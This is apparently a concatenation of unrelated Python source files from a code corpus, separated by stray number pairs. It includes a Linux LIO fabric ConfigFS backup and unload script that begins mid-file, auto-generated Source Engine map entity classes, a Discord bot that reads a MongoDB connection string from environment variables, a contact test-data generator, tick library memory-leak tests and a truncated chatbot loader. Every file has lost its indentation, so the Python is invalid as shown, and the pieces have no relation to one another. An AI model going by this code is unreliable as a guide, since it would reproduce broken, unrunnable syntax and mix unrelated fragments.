print "Making backup of " + fabric_name + "/ConfigFS with timestamp: " + now
backup_file = backup_dir + "/" + fabric_name + "_backup-" + now + ".sh"
if os.path.isfile(backup_file):
print "" + fabric_name + " backup_file: " + backup_file + "already exists, exiting"
p.close()
sys.exit(1)
back = open(backup_file, 'w')
line = p.readline()
while line:
print >>back, line.rstrip()
line = p.readline()
p.close()
back.close()
ret = shutil.copyfile(backup_file, orig_file)
if ret:
print "Unable to copy " + back_file
sys.exit(1)
print "Successfully updated default config " + orig_file
return backup_file
def fabric_backup_to_file_all(date_time):
if not os.path.isdir(target_root):
print "Unable to open target_root: " + target_root
sys.exit(1)
for fabric_name in os.listdir(target_root):
if fabric_name == "version":
continue
if fabric_name == "core":
continue
# FIXME: currently using lio_dump
if fabric_name == "iscsi":
continue
fabric_root = target_root + fabric_name
# print "Using fabric_backup_to_file: " + date_time + ", " + fabric_name + ", " + fabric_root
module_name = fabric_get_module_name(fabric_name)
# print "Using module_name: "+ module_name
fabric_backup_to_file(date_time, fabric_name, fabric_root, module_name)
return
def fabric_unload(fabric_name, fabric_root, module_name):
if not os.path.isdir(fabric_root):
print "Unable to access fabric_root: " + fabric_root
sys.exit(1)
wwn_root = os.listdir(fabric_root)
for wwn in wwn_root:
if not os.path.isdir(fabric_root + "/" + wwn):
continue
if wwn == "discovery_auth":
continue
tpg_root = fabric_root + "/" + wwn
for tpgt_tmp in os.listdir(tpg_root):
if tpgt_tmp == "fabric_statistics":
continue
tpgt_tmp2 = tpgt_tmp.split('_')
tpgt = tpgt_tmp2[1]
if os.path.isfile(fabric_root + "/" + wwn + "/tpgt_" + tpgt + "/enable"):
disable_op = "echo 0 > " + fabric_root + "/" + wwn + "/tpgt_" + tpgt + "/enable"
ret = os.system(disable_op)
if ret:
print "Unable to disable TPG: " + wwn + " TPGT: " + tpgt
nacl_root = fabric_root + "/" + wwn + "/tpgt_" + tpgt + "/acls"
for nacl in os.listdir(nacl_root):
lun_acl_root = nacl_root + "/" + nacl + "/"
for lun_acl in os.listdir(lun_acl_root):
ret = re.search('lun_', lun_acl)
if not ret:
continue
mapped_lun = lun_acl[4:]
lun_link_dir = lun_acl_root + "/" + lun_acl + "/"
for lun_acl_link in os.listdir(lun_link_dir):
if lun_acl_link == "write_protect":
continue
if os.path.islink(lun_link_dir + "/" + lun_acl_link):
unlink_op = lun_link_dir + "/" + lun_acl_link
ret = os.unlink(unlink_op)
if ret:
print "Unable to unlink MappedLUN: " + lun_link_dir + "/" + lun_acl_link
dellunacl_op = "rmdir " + lun_link_dir
ret = os.system(dellunacl_op)
if ret:
print "Unable to rmdir fabric mapped_lun"
delnodeacl_op = "rmdir " + nacl_root + "/" + nacl + "/"
ret = os.system(delnodeacl_op)
if ret:
print "Unable to remove NodeACL: " + nacl_root + "/" + nacl + "/"
lun_root = fabric_root + "/" + wwn + "/tpgt_" + tpgt + "/lun"
for lun_tmp in os.listdir(lun_root):
lun_tmp2 = lun_tmp.split('_')
lun = lun_tmp2[1]
lun_dir = lun_root + "/lun_" + lun
for port in os.listdir(lun_dir):
if not os.path.islink(lun_dir + "/" + port):
continue
unlink_op = lun_dir + "/" + port
ret = os.unlink(unlink_op)
if ret:
print "Unable to unlink fabric port/lun"
rmdir_op= "rmdir " + lun_dir
ret = os.system(rmdir_op);
if ret:
print "Unable to rmdir fabric port/lun: " + lun_dir
rmdir_op = "rmdir " + fabric_root + "/" + wwn + "/tpgt_" + tpgt + "/"
ret = os.system(rmdir_op)
if ret:
print "Unable to rmdir fabric tpg: " + fabric_root + "/" + wwn + "/tpgt_" + tpgt + "/"
rmdir_op = "rmdir " + fabric_root + "/" + wwn + "/"
ret = os.system(rmdir_op)
if ret:
print "Unable to rmdir fabric wwn: " + fabric_root + "/" + wwn + "/"
rmdir_op = "rmdir " + fabric_root
ret = os.system(rmdir_op)
if ret:
print "Unable to release fabric_root: " + fabric_root
rmmod_op = "rmmod " + module_name
ret = os.system(rmmod_op)
if ret:
print "Unable to unload " + module_name
print "Successfully released fabric: " + fabric_root
return
def fabric_get_module_name(fabric_name):
kernel_module = ""
for specs in os.listdir(spec_root):
if specs == "README":
continue
# print "specs: " + specs + ", fabric_name: " + fabric_name
if not re.search(fabric_name + ".spec", specs) and not re.search("tcm_" + fabric_name + ".spec", specs) and not re.search(fabric_name, specs):
continue
op = "cat " + spec_root + specs
p = sub.Popen(op, shell=True, stdout=sub.PIPE).stdout
if not p:
print "Unable to dump " + fabric_name + "/ConfigFS running state"
sys.exit(1)
line = p.readline()
while line:
tmp = line.rstrip()
# Check for 'kernel_module' line in $FABRIC.spec
if re.search('kernel_module', tmp):
tmp_list = tmp.split('= ')
p.close()
return tmp_list[1]
line = p.readline()
p.close()
return kernel_module
def fabric_unloadall():
module_name = ""
try:
for fabric_name in os.listdir(target_root):
if fabric_name == "version":
continue
if fabric_name == "core":
continue
# FIXME: currently using lio_node --unload
if fabric_name == "iscsi":
continue
fabric_root = target_root + fabric_name
module_name = fabric_get_module_name(fabric_name)
#print "fabric_get_module_name() using: " + module_name
if module_name == "":
continue
fabric_unload(fabric_name, fabric_root, module_name)
except OSError, (errno, strerror):
if errno == 2:
fabric_err("%s %s\n%s" % (target_root, strerror, "Is kernel module loaded?") )
def do_work(stdout_enable, stdout_enable_all, date_time, unload, unloadall, fabric_name, fabric_root, module_name):
if not stdout_enable == "None":
fabric_configfs_dump(fabric_name, fabric_root, module_name)
elif not stdout_enable_all == "None":
fabric_configfs_dump_all()
elif not date_time == "None":
fabric_backup_to_file(date_time, fabric_name, fabric_root, module_name)
elif not unload == "None":
fabric_unload(fabric_name, fabric_root, module_name)
elif not unloadall == "None":
fabric_unloadall()
return 0
def main():
parser_fabric = optparse.OptionParser()
parser_fabric.add_option("--s","--stdout", dest='stdout_enable', action='store', nargs=0,
help="Dump running Fabric/ConfigFS syntax to STDOUT", type='string')
parser_fabric.add_option("--z","--stdoutall", dest='stdout_enable_all', action='store', nargs=0,
help="Dump all running Fabric/ConfigFS syntax to STDOUT", type='string')
parser_fabric.add_option("--t", "--tofile", dest="date_time", action='store', nargs=1,
help="Backup running Fabric/ConfigFS syntax to /etc/target/backup/fabricname_backup-<DATE_TIME>.sh",
type='string')
parser_fabric.add_option("--u", "--unload", dest="unload", action='store', nargs=0,
help="Unload running Fabric/ConfigFS", type='string')
parser_fabric.add_option("--a", "--unloadall", dest="unloadall", action='store', nargs=0,
help="Unload all running Fabric/ConfigFS", type='string')
parser_fabric.add_option("--f", "--fabric-name", dest='fabric_name', action='store', nargs=1,
help="Target fabric name", type='string')
parser_fabric.add_option("--r", "--fabric-root", dest='fabric_root', action='store', nargs=1,
help="Target fabric configfs root", type='string')
parser_fabric.add_option("--m", "--module-name", dest='module_name', action='store', nargs=1,
help="Target fabric module name ", type='string')
(opts_fabric, args_fabric) = parser_fabric.parse_args()
mandatories = ['fabric_name', 'fabric_root', 'module_name']
for m in mandatories:
if not opts_fabric.__dict__[m]:
unloadall = str(opts_fabric.__dict__['unloadall'])
stdout_enable = str(opts_fabric.__dict__['stdout_enable'])
stdout_enable_all = str(opts_fabric.__dict__['stdout_enable_all'])
date_time = str(opts_fabric.__dict__['date_time'])
if unloadall == "None" and stdout_enable == "None" and stdout_enable_all == "None" and date_time == "None":
print "mandatory option is missing\n"
parser_fabric.print_help()
exit(-1)
do_work(str(opts_fabric.stdout_enable), str(opts_fabric.stdout_enable_all),
str(opts_fabric.date_time), str(opts_fabric.unload), str(opts_fabric.unloadall),
str(opts_fabric.fabric_name), str(opts_fabric.fabric_root),
str(opts_fabric.module_name))
if __name__ == "__main__":
main()
| 17,866 | 7,805 |
"""
Helper classes for creating maps in any Source Engine game that uses hl2mp.fgd.
This file was auto-generated by import_fgd.py on 2020-01-19 09:11:14.977620.
"""
from vmflib2.vmf import *
class FilterActivatorTeam(Entity):
"""
Auto-generated from hl2mp.fgd, line 30.
A filter that filters by the team of the activator.
"""
def __init__(self, vmf_map: "ValveMap", origin: "Origin"="0 0 0", targetname: str="", Negated="Allow entities that match criteria", filterteam=2):
Entity.__init__(self, "filter_activator_team", vmf_map)
# Origin : This entity's location in 3D space.
self.origin: "Origin" = origin
# Name : The name that other entities refer to this entity by.
self.targetname: str = targetname
# Filter mode : If set to Allow, only entities who match the criteria will pass the filter.
self.Negated = Negated
# Filter Team Number :
self.filterteam = filterteam
self.auto_properties.extend(["origin", "targetname", "Negated", "filterteam"])
class InfoPlayerCombine(Entity):
"""
Auto-generated from hl2mp.fgd, line 17.
This entity indicates the position and facing direction at which the player will spawn during a deathmatch map. Any number of info_player_deathmatch entities may be placed in a map.
"""
def __init__(self, vmf_map: "ValveMap", origin: "Origin"="0 0 0", angles: "Origin"="0 0 0"):
Entity.__init__(self, "info_player_combine", vmf_map)
# Origin : This entity's location in 3D space.
self.origin: "Origin" = origin
# Pitch Yaw Roll (Y Z X) : This entity's orientation in the world. Pitch is rotation around the Y axis,
self.angles: "Origin" = angles
self.auto_properties.extend(["origin", "angles"])
class InfoPlayerDeathmatch(Entity):
"""
Auto-generated from hl2mp.fgd, line 10.
This entity indicates the position and facing direction at which the player will spawn during a deathmatch map. Any number of info_player_deathmatch entities may be placed in a map.
"""
def __init__(self, vmf_map: "ValveMap", origin: "Origin"="0 0 0", angles: "Origin"="0 0 0"):
Entity.__init__(self, "info_player_deathmatch", vmf_map)
# Origin : This entity's location in 3D space.
self.origin: "Origin" = origin
# Pitch Yaw Roll (Y Z X) : This entity's orientation in the world. Pitch is rotation around the Y axis,
self.angles: "Origin" = angles
self.auto_properties.extend(["origin", "angles"])
class InfoPlayerRebel(Entity):
"""
Auto-generated from hl2mp.fgd, line 24.
This entity indicates the position and facing direction at which the player will spawn during a deathmatch map. Any number of info_player_deathmatch entities may be placed in a map.
"""
def __init__(self, vmf_map: "ValveMap", origin: "Origin"="0 0 0", angles: "Origin"="0 0 0"):
Entity.__init__(self, "info_player_rebel", vmf_map)
# Origin : This entity's location in 3D space.
self.origin: "Origin" = origin
# Pitch Yaw Roll (Y Z X) : This entity's orientation in the world. Pitch is rotation around the Y axis,
self.angles: "Origin" = angles
self.auto_properties.extend(["origin", "angles"])
class PropPhysicsRespawnable(Entity):
"""
Auto-generated from hl2mp.fgd, line 43.
This class is the same as prop_physics, except it respawns after it breaks
"""
def __init__(self, vmf_map: "ValveMap", origin: "Origin"="0 0 0", globalname: str="", angles: "Origin"="0 0 0", model: str="", skin: int=0, modelscale: float="1.0", targetname: str="", damagefilter: str="", disableshadows=0, ExplodeDamage: float=0, ExplodeRadius: float=0, PerformanceMode=0, BreakModelMessage: str="", pressuredelay: float=0, mindxlevel=0, maxdxlevel=0, fademindist: float=-1, fademaxdist: float=0, fadescale: float=1, spawnflags="", minhealthdmg: int=0, shadowcastdist: int=0, physdamagescale: float="0.1", Damagetype=0, nodamageforces=0, inertiaScale: float="1.0", massScale: float="0", overridescript: str="", damagetoenablemotion: int=0, forcetoenablemotion: float=0, puntsound: str="", renderfx=0, rendermode=0, renderamt: int=255, rendercolor: "RGB"="255 255 255", disablereceiveshadows=0, RespawnTime: float=60):
Entity.__init__(self, "prop_physics_respawnable", vmf_map)
# Origin : This entity's location in 3D space.
self.origin: "Origin" = origin
# Global Entity Name : Name by which this entity is linked to another entity in a different map. When the player transitions to a new map, entities in the new map with globalnames matching entities in the previous map will have the previous map's state copied over their state.
self.globalname: str = globalname
# Pitch Yaw Roll (Y Z X) : This entity's orientation in the world. Pitch is rotation around the Y axis,
self.angles: "Origin" = angles
# World Model :
self.model: str = model
# Skin : Some models have multiple versions of their textures, called skins. Set this to a number other than 0 to use that skin instead of the default.
self.skin: int = skin
# Model Scale : A multiplier for the size of the model.
self.modelscale: float = modelscale
# Name : The name that other entities refer to this entity by.
self.targetname: str = targetname
# Damage Filter : Name of the filter entity that controls which entities can damage us.
self.damagefilter: str = damagefilter
# Disable shadows :
self.disableshadows = disableshadows
# Explosion Damage : If non-zero, when this entity breaks it will create an explosion that causes the specified amount of damage. See also 'Explosion Radius'.
self.ExplodeDamage: float = ExplodeDamage
# Explosion Radius : If non-zero, when this entity breaks it will create an explosion with a radius of the specified amount. See also 'Explosion Damage'.
self.ExplodeRadius: float = ExplodeRadius
# Performance Mode : Used to limit the amount of gibs produced when this entity breaks, for performance reasons.
self.PerformanceMode = PerformanceMode
# Break Model Message : If set, will use this break model message instead of the normal break behavior.
self.BreakModelMessage: str = BreakModelMessage
# Pressure Delay : Delay, in seconds, after 'broken' by pressure before breaking apart (allows for sound to play before breaking apart).
self.pressuredelay: float = pressuredelay
# Minimum DX Level :
self.mindxlevel = mindxlevel
# Maximum DX Level :
self.maxdxlevel = maxdxlevel
# Start Fade Dist : Distance at which the prop starts to fade (<0 = use fademaxdist).
self.fademindist: float = fademindist
# End Fade Dist : Max fade distance at which the prop is visible (0 = don't fade out)
self.fademaxdist: float = fademaxdist
# Fade Scale : If you specify a fade in the worldspawn, or if the engine is running under dx7, then the engine will forcibly fade out props even if fademindist/fademaxdist isn't specified.
self.fadescale: float = fadescale
# TODO: Replace this filler. :
self.spawnflags = spawnflags
# Min Damage to Hurt : The prop will ignore any damage events if the damage is less than this amount.
self.minhealthdmg: int = minhealthdmg
# Shadow Cast Distance : Use this to override how far this object casts shadows. 0 = default distance.
self.shadowcastdist: int = shadowcastdist
# Physics Impact Damage Scale : Scales damage energy when this object is hit by a physics object. NOTE: 0 means this feature is disabled for backwards compatibility.\nSet to 1.0 for materials as strong as flesh, smaller numbers indicate stronger materials.
self.physdamagescale: float = physdamagescale
# Impact damage type :
self.Damagetype = Damagetype
# Damaging it Doesn't Push It : Used to determine whether or not damage should cause the brush to move.
self.nodamageforces = nodamageforces
# Scale Factor For Inertia : Scales the angular mass of an object. Used to hack angular damage and collision response.
self.inertiaScale: float = inertiaScale
# Mass Scale : A scale multiplier for the object's mass.
self.massScale: float = massScale
# Override Parameters : A list of physics key/value pairs that are usually in a physics prop .qc file. Format is 'key,value,key,value,etc'.
self.overridescript: str = overridescript
# Health Level to Override Motion : If specified, this object will start motion disabled. Once its health has dropped below this specified amount, it will enable motion.
self.damagetoenablemotion: int = damagetoenablemotion
# Physics Impact Force to Override Motion : If specified, this object will start motion disabled. Any impact that imparts a force greater than this value on the physbox will enable motion.
self.forcetoenablemotion: float = forcetoenablemotion
# Sound to make when punted :
self.puntsound: str = puntsound
# Render FX :
self.renderfx = renderfx
# Render Mode : Used to set a non-standard rendering mode on this entity. See also 'FX Amount' and 'FX Color'.
self.rendermode = rendermode
# FX Amount (0 - 255) : The FX amount is used by the selected Render Mode.
self.renderamt: int = renderamt
# FX Color (R G B) : The FX color is used by the selected Render Mode.
self.rendercolor: "RGB" = rendercolor
# Disable Receiving Shadows :
self.disablereceiveshadows = disablereceiveshadows
# Respawn Time : Ammount in seconds this prop will respawn after it breaks.
self.RespawnTime: float = RespawnTime
self.auto_properties.extend(["origin", "globalname", "angles", "model", "skin", "modelscale", "targetname", "damagefilter", "disableshadows", "ExplodeDamage", "ExplodeRadius", "PerformanceMode", "BreakModelMessage", "pressuredelay", "mindxlevel", "maxdxlevel", "fademindist", "fademaxdist", "fadescale", "spawnflags", "minhealthdmg", "shadowcastdist", "physdamagescale", "Damagetype", "nodamageforces", "inertiaScale", "massScale", "overridescript", "damagetoenablemotion", "forcetoenablemotion", "puntsound", "renderfx", "rendermode", "renderamt", "rendercolor", "disablereceiveshadows", "RespawnTime"])
class WeaponSlam(Entity):
"""
Auto-generated from hl2mp.fgd, line 50.
S.L.A.M. - Selectable Lightweight Attack Munition
"""
def __init__(self, vmf_map: "ValveMap", origin: "Origin"="0 0 0", targetname: str="", angles: "Origin"="0 0 0", spawnflags="", fademindist: float=-1, fademaxdist: float=0, fadescale: float=1):
Entity.__init__(self, "weapon_slam", vmf_map)
# Origin : This entity's location in 3D space.
self.origin: "Origin" = origin
# Name : The name that other entities refer to this entity by.
self.targetname: str = targetname
# Pitch Yaw Roll (Y Z X) : This entity's orientation in the world. Pitch is rotation around the Y axis,
self.angles: "Origin" = angles
# TODO: Replace this filler. :
self.spawnflags = spawnflags
# Start Fade Dist/Pixels : Distance at which the prop starts to fade (<0 = use fademaxdist). If 'Screen Space Fade' is selected, this represents the number of pixels wide covered by the prop when it starts to fade.
self.fademindist: float = fademindist
# End Fade Dist/Pixels : Maximum distance at which the prop is visible (0 = don't fade out). If 'Screen Space Fade' is selected, this represents the *minimum* number of pixels wide covered by the prop when it fades.
self.fademaxdist: float = fademaxdist
# Fade Scale : If you specify a fade in the worldspawn, or if the engine is running under dx7, then the engine will forcibly fade out props even if fademindist/fademaxdist isn't specified.
self.fadescale: float = fadescale
self.auto_properties.extend(["origin", "targetname", "angles", "spawnflags", "fademindist", "fademaxdist", "fadescale"])
| 12,321 | 3,687 |
import os
BASE_DIR = os.path.dirname(__file__)
__config__ = os.path.abspath(os.path.join(BASE_DIR, "../config.cfg"))
__template__ = os.path.abspath(os.path.join(BASE_DIR, "templates"))
__static__ = os.path.abspath(os.path.join(BASE_DIR, "static"))
__upload__ = os.path.abspath(os.path.join(__static__, "uploads"))
| 317 | 128 |
import nextcord
from nextcord.ext import commands
import json
import os
import pymongo
import os
from keep_alive import keep_alive
# Set environment variables
# os.environ['info'] = "test:pass123"
# os.environ['TOKEN'] = "MY-AWSOME-TOKEN"
intents = nextcord.Intents.all()
TOKEN = os.environ['TOKEN']
async def prefix_d(_, message):
f = pymongo.MongoClient(
f"mongodb+srv://{os.environ['info']}@cluster0.o0xc5.mongodb.net/myFirstDatabase?retryWrites=true&w=majority")
cluster = f["Guardzilla"]
prefix = cluster["prefix"]
prefix_x = prefix.find_one({"_id": 0})
if not prefix_x or str(message.guild.id) not in prefix_x:
prefix.delete_one({"_id": 0})
prefix.insert_one({"_id": 0, str(message.guild.id): "."})
prefix_x = prefix.find_one({"_id": 0})
if str(message.content).startswith(prefix_x[str(message.guild.id)]):
return prefix_x[str(message.guild.id)]
else:
return str(client.user.id)
client = nextcord.ext.commands.Bot(
command_prefix=prefix_d, intents=intents, help_command=None)
@client.event
async def on_ready():
print(f'{client.user} has connected to Discord!')
for pyFile in os.listdir("./commands"):
if pyFile.endswith(".py"):
client.load_extension(f"commands.{pyFile[:-3]}")
print(f"{pyFile[:-3]} | Loaded")
keep_alive()
client.run(TOKEN)
| 1,363 | 509 |
from models.model_contact import Contact
import random
import string
import os.path
import jsonpickle
import getopt
import sys
def random_string(prefix, maxlen):
symbols = string.ascii_letters + string.digits
return prefix + ''.join([random.choice(symbols) for i in range(random.randrange(maxlen))])
try:
opts, args = getopt.getopt(sys.argv[1:], "n:f:", ["number_of_groups", "file"])
except getopt.GetoptError as err:
getopt.usage()
sys.exit(2)
n = 5
f = "data/contacts.json"
for o, a in opts:
if o == '-n':
n = int(a)
elif o == '-f':
f = a
testdata = [Contact(firstname='Stepan', middlename='Barantsev', lastname='Lol',
nickname='Bloodes', email1='stepan.barantsev@gmail.com')] +\
[Contact(firstname=random_string('', 10),
middlename=random_string('', 20),
lastname=random_string('', 20),
nickname=random_string('', 20),
homephone=random_string('', 20),
mobilephone=random_string('', 20),
workphone=random_string('', 20),
secondaryphone=random_string('', 20),
email1=random_string('', 20),
email2=random_string('', 20),
email3=random_string('', 20),
title=random_string('', 20),
notes=random_string('', 20),
company=random_string('', 20),
homepage=random_string('', 20),
fax=random_string('', 20))
for i in range(5)
]
file = os.path.join(os.path.dirname(os.path.abspath(__file__)), "..", f)
with open(file, 'w') as out:
jsonpickle.set_encoder_options("json", indent=2)
out.write(jsonpickle.encode(testdata))
| 1,841 | 603 |
# License: BSD 3 clause
import gc
import unittest
import weakref
import numpy as np
import scipy
from scipy.sparse import csr_matrix
from tick.array.build.array import tick_double_sparse2d_from_file
from tick.array.build.array import tick_double_sparse2d_to_file
from tick.array_test.build import array_test as test
class Test(unittest.TestCase):
def test_varray_smart_pointer_in_cpp(self):
"""...Test C++ reference counter
"""
vcc = test.VarrayContainer()
self.assertEqual(vcc.nRef(), 0)
vcc.initVarray()
self.assertEqual(vcc.nRef(), 1)
cu1 = test.VarrayUser()
cu1.setArray(vcc)
self.assertEqual(vcc.nRef(), 2)
cu1.setArray(vcc)
self.assertEqual(vcc.nRef(), 2)
cu2 = test.VarrayUser()
cu2.setArray(vcc)
self.assertEqual(vcc.nRef(), 3)
del cu1
self.assertEqual(vcc.nRef(), 2)
cu3 = test.VarrayUser()
cu3.setArray(vcc)
self.assertEqual(vcc.nRef(), 3)
del cu3, cu2
self.assertEqual(vcc.nRef(), 1)
# we cannot check it will go to 0 after vcc deletion in Python
cu4 = test.VarrayUser()
cu4.setArray(vcc)
self.assertEqual(vcc.nRef(), 2)
del vcc
self.assertEqual(cu4.nRef(), 1)
# we cannot check it will go to 0 after cu4 deletion in Python
del cu4
def test_varray_smart_pointer_deletion1(self):
"""...Test that varray is still alive after deletion in Python
"""
vcc = test.VarrayContainer()
vcc.initVarray()
# Now mix with some Python
a = vcc.varrayPtr
# This does not increment C++ reference counter
self.assertEqual(vcc.nRef(), 1)
# Get a weak ref of the array
r = weakref.ref(a)
del a
np.testing.assert_array_almost_equal(r(), vcc.varrayPtr)
del vcc
self.assertIsNone(r())
def test_varray_smart_pointer_deletion2(self):
"""...Test that base is deleted after a double assignment in Python
"""
vcc = test.VarrayContainer()
vcc.initVarray()
a = vcc.varrayPtr
b = vcc.varrayPtr
r = weakref.ref(b)
del a, vcc, b
self.assertIsNone(r())
def test_varray_smart_pointer_deletion3(self):
"""...Test that base is deleted after a double assignment in Python
"""
vcc = test.VarrayContainer()
vcc.initVarray()
# Now mix with some Python
a = vcc.varrayPtr
a_sum = np.sum(a)
# This does not increment C++ reference counter
self.assertEqual(vcc.nRef(), 1)
# Get a weak ref of the array
r = weakref.ref(vcc.varrayPtr)
del vcc
np.testing.assert_array_almost_equal(a_sum, np.sum(a))
self.assertIsNone(r())
del a
def test_sarray_memory_leaks(self):
"""...Test brute force method in order to see if we have a memory leak
during typemap out
"""
import os
try:
import psutil
except ImportError:
print('Without psutils we cannot ensure we have no memory leaks')
return
def get_memory_used():
"""Returns memory used by current process
"""
process = psutil.Process(os.getpid())
return process.memory_info()[0]
initial_memory = get_memory_used()
size = int(1e6)
# The size in memory of an array of ``size`` doubles
bytes_size = size * 8
a = test.test_typemap_out_SArrayDoublePtr(size)
first_filled_memory = get_memory_used()
# Check that new memory is of the correct order (10%)
self.assertAlmostEqual(first_filled_memory - initial_memory,
bytes_size, delta=1.1 * bytes_size)
for _ in range(10):
del a
a = test.test_typemap_out_SArrayDoublePtr(size)
filled_memory = get_memory_used()
# Check memory is not increasing
self.assertAlmostEqual(first_filled_memory - initial_memory,
filled_memory - initial_memory,
delta=1.1 * bytes_size)
#print("\nfirst_filled_memory %.2g, filled_memory %.2g, initial_memory %.2g, array_bytes_size %.2g" % (first_filled_memory, filled_memory, initial_memory, bytes_size))
def test_sarray_memory_leaks2(self):
"""...Test brute force method in order to see if we have a memory leak
during typemap in or out
"""
import os
try:
import psutil
except ImportError:
print('Without psutils we cannot ensure we have no memory leaks')
return
def get_memory_used():
"""Returns memory used by current process
"""
process = psutil.Process(os.getpid())
return process.memory_info()[0]
size = int(1e6)
a, b = np.ones(size), np.arange(size, dtype=float)
initial_memory = get_memory_used()
# The size in memory of an array of ``size`` doubles
bytes_size = 2 * size * 8
c = test.test_VArrayDouble_append(a, b)
first_filled_memory = get_memory_used()
# Check that new memory is of the correct order (10%)
self.assertAlmostEqual(first_filled_memory,
initial_memory + bytes_size,
delta=1.1 * bytes_size)
for _ in range(10):
del c
c = test.test_VArrayDouble_append(a, b)
filled_memory = get_memory_used()
# Check memory is not increasing
self.assertAlmostEqual(first_filled_memory - initial_memory,
filled_memory - initial_memory,
delta=1.1 * bytes_size)
def test_sarray2d_memory_leaks(self):
"""...Test brute force method in order to see if we have a memory leak
during typemap out
"""
import os
try:
import psutil
except ImportError:
print('Without psutils we cannot ensure we have no memory leaks')
return
def get_memory_used():
"""Returns memory used by current process
"""
process = psutil.Process(os.getpid())
return process.memory_info()[0]
initial_memory = get_memory_used()
n_rows = int(1e2)
n_cols = int(1e3)
# The size in memory of an array of ``size`` doubles
bytes_size = n_rows * n_cols * 8
a = test.test_typemap_out_SArrayDouble2dPtr(n_rows, n_cols)
first_filled_memory = get_memory_used()
# Check that new memory is of the correct order (10%)
self.assertAlmostEqual(first_filled_memory - initial_memory,
bytes_size, delta=1.1 * bytes_size)
for _ in range(10):
del a
a = test.test_typemap_out_SArrayDouble2dPtr(n_rows, n_cols)
filled_memory = get_memory_used()
# Check memory is not increasing
self.assertAlmostEqual(first_filled_memory - initial_memory,
filled_memory - initial_memory,
delta=1.1 * bytes_size)
def test_s_sparse_array2d_memory_leaks(self):
"""...Test brute force method in order to see if we have a memory leak
during typemap out
"""
import os
try:
import psutil
except ImportError:
print('Without psutils we cannot ensure we have no memory leaks')
return
def get_memory_used():
"""Returns memory used by current process
"""
process = psutil.Process(os.getpid())
return process.memory_info()[0]
cereal_file = "sparse.gen.cereal"
try:
n_rows = int(1e3)
n_cols = int(1e2)
s_spar = int((n_rows * n_cols) * .3)
data_size = (s_spar * 8)
# The size in memory of an array of ``size`` doubles
bytes_size = (data_size * 2) + ((n_rows + 1) * 8)
sparsearray_double = scipy.sparse.rand(
n_rows, n_cols, 0.3, format="csr", dtype=np.float64)
tick_double_sparse2d_to_file(cereal_file, sparsearray_double)
initial_memory = get_memory_used()
a = tick_double_sparse2d_from_file(cereal_file)
first_filled_memory = get_memory_used()
# Check that new memory is of the correct order (10%)
self.assertAlmostEqual(first_filled_memory - initial_memory,
bytes_size, delta=1.1 * bytes_size)
del a
for i in range(10):
# Check memory is not increasing
gc.collect()
filled_memory = get_memory_used()
self.assertAlmostEqual(filled_memory, initial_memory,
delta=1.1 * bytes_size)
X = tick_double_sparse2d_from_file(cereal_file)
del X
gc.collect()
end = get_memory_used()
self.assertAlmostEqual(end, initial_memory, delta=1.1 * bytes_size)
finally:
if os.path.exists(cereal_file):
os.remove(cereal_file)
def test_varray_share_same_support(self):
"""...Test that modifications on Varray of in Python affect the same
support
"""
vcc = test.VarrayContainer()
vcc.initVarray()
# Now mix with some Python
a = vcc.varrayPtr
a[0] = 99.0
self.assertEqual(vcc.varrayPtr[0], 99.0)
vcc.varrayPtr[1] = 999.0
self.assertEqual(a[1], 999.0)
def test_sbasearrayptr(self):
sparsearray_double = csr_matrix(
(np.array([1., 2, 3, 4, 5]), np.array([2, 4, 6, 8, 10]),
np.array([0, 5])), shape=(1, 12))
test.test_sbasearray_container_new(sparsearray_double)
self.assertEqual(test.test_sbasearray_container_compute(), 45)
test.test_sbasearray_container_clear()
self.assertEqual(test.test_sbasearray_container_compute(), -1)
array_double = np.arange(2, 14, dtype=float)
test.test_sbasearray_container_new(array_double)
self.assertEqual(test.test_sbasearray_container_compute(),
array_double.sum())
test.test_sbasearray_container_clear()
self.assertEqual(test.test_sbasearray_container_compute(), -1)
def test_ref_sbasearrayptr(self):
sparsearray_double = csr_matrix(
(np.array([1., 2, 3, 4, 5]), np.array([2, 4, 6, 8, 10]),
np.array([0, 5])), shape=(1, 12))
refdata = weakref.ref(sparsearray_double.data)
refindices = weakref.ref(sparsearray_double.indices)
refindptr = weakref.ref(sparsearray_double.indptr)
test.test_sbasearray_container_new(sparsearray_double)
del sparsearray_double
self.assertIsNone(refindptr())
self.assertIsNotNone(refdata())
self.assertIsNotNone(refindices())
test.test_sbasearray_container_clear()
self.assertIsNone(refdata())
self.assertIsNone(refindices())
array_double = np.arange(2, 14, dtype=float)
ref = weakref.ref(array_double)
test.test_sbasearray_container_new(array_double)
del array_double
self.assertIsNotNone(ref())
test.test_sbasearray_container_clear()
self.assertIsNone(ref())
def test_sbasearray2dptr(self):
sparsearray2d_double = csr_matrix(
(np.array([1., 2, 3, 4, 5]), np.array([2, 4, 6, 1, 3]),
np.array([0, 3, 5])), shape=(2, 4))
test.test_sbasearray2d_container_new(sparsearray2d_double)
self.assertEqual(test.test_sbasearray2d_container_compute(), 39)
test.test_sbasearray2d_container_clear()
self.assertEqual(test.test_sbasearray2d_container_compute(), -1)
array2d_double = np.array([[1.2, 3], [4, 5]])
test.test_sbasearray2d_container_new(array2d_double)
self.assertEqual(test.test_sbasearray2d_container_compute(),
array2d_double.sum())
test.test_sbasearray2d_container_clear()
self.assertEqual(test.test_sbasearray2d_container_compute(), -1)
def test_ref_sbasearray2dptr(self):
sparsearray2d_double = csr_matrix(
(np.array([1., 2, 3, 4, 5]), np.array([2, 4, 6, 1, 3]),
np.array([0, 3, 5])), shape=(2, 4))
refdata = weakref.ref(sparsearray2d_double.data)
refindices = weakref.ref(sparsearray2d_double.indices)
refindptr = weakref.ref(sparsearray2d_double.indptr)
test.test_sbasearray2d_container_new(sparsearray2d_double)
del sparsearray2d_double
self.assertIsNotNone(refindptr())
self.assertIsNotNone(refdata())
self.assertIsNotNone(refindices())
test.test_sbasearray2d_container_clear()
self.assertIsNone(refindptr())
self.assertIsNone(refdata())
self.assertIsNone(refindices())
array2d_double = np.array([[1.2, 3], [4, 5]])
ref = weakref.ref(array2d_double)
test.test_sbasearray2d_container_new(array2d_double)
del array2d_double
self.assertIsNotNone(ref())
test.test_sbasearray2d_container_clear()
self.assertIsNone(ref())
if __name__ == "__main__":
unittest.main()
| 13,598 | 4,274 |
# Author: DINDIN Meryll
# Date: 15 September 2019
# Project: RoadBuddy
try: from chatbot.imports import *
except: from imports import *
class Contextualizer:
def __init__(self):
try:
self._load_models()
except:
drc = ['models', 'datasets']
for d in drc:
if not os.path.exists(d): os.mkdir(d)
self._download_models()
self._load_models()
def _download_models(self):
s3 = boto3.client('s3')
# Download dataset
fle = ('datasets.huggingface.co', 'personachat/personachat_self_original.json')
